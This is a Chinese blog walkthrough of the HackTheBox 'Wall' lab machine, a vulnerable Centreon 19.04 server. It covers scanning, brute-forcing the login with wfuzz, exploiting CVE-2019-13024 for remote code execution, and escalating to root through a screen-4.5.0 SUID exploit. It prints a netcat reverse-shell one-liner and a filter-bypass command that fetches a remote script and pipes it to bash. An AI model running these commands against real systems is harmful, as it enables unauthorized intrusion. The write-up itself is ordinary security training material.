No.175-HackTheBox-Linux-Wall-Walkthrough渗透学习
**
HackTheBox-Linux-Wall-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/208
靶机难度:初级(2.4/10)
靶机发布日期:2019年12月05日
靶机描述:
Wall is a medium difficulty Linux machine running a vulnerable version of Centreon network monitoring software, which can be accessed through HTTP Verb Tampering. The login page can be brute-forced to gain Admin access, which is exploited to gain RCE. A compiled python file is decompiled to extract user credentials This provides access to an SUID, resulting in a root shell.
作者:大余
时间:2020-07-27
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.157…
我这里利用Masscan快速的扫描出了22,80端口,在利用nmap详细的扫描了这些端口情况…看图即可
web页面访问的是apache…
爆破了目录…枚举看看
可看到minitoring是个身份认证登录页面…
查看返回的参数,会重定向到centreon页面下…
可看到该页面服务是centreon框架搭设的,版本是19.04
命令:wfuzz -c -X POST -d "username=admin&password=FUZZ" -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt http://wall.htb/centreon/api/index.php?action=authenticate
这里查看了该框架的19.04的内核漏洞,后面有介绍…
里面可看到centreon的源代码框架页面…从里面收集到了爆破目录的信息…
利用Wfuzz枚举获得了页面的登录密码…
登录页面后,查看版本信息…开始利用CVE-2019-13024提权…
47069下载到本地…
该nagios_bin字段是将在服务器上执行的字段…
EXP代码也提示了执行该脚本需要用户名密码…
根据脚本提示执行需要的信息…
shell:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1337 >/tmp/f
这里需要注意的是,页面存在字符串拦截…需要空格才可绕过…测试了很久…
绕过:wget${IFS}-qO-${IFS}http://10.10.14.8/a${IFS}|${IFS}bash;
可看到获得了反向外壳…
LinEnum枚举发现了SUID存在screen-4.5.0二进制程序…
这里遇到了几次了…直接找漏洞提权
将41154放入目录…
可看到…本地利用gcc编译即可…
编译好后开启python服务…上传
上传完后,利用EXP的方法…执行即可…简单
成功获得了root权限,并获得了root_flag信息…
由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
本文地址:https://blog.csdn.net/qq_34801745/article/details/107600681
上一篇: HTTP状态码大全
下一篇: 刷脸支付即插即用而且兼顾扫码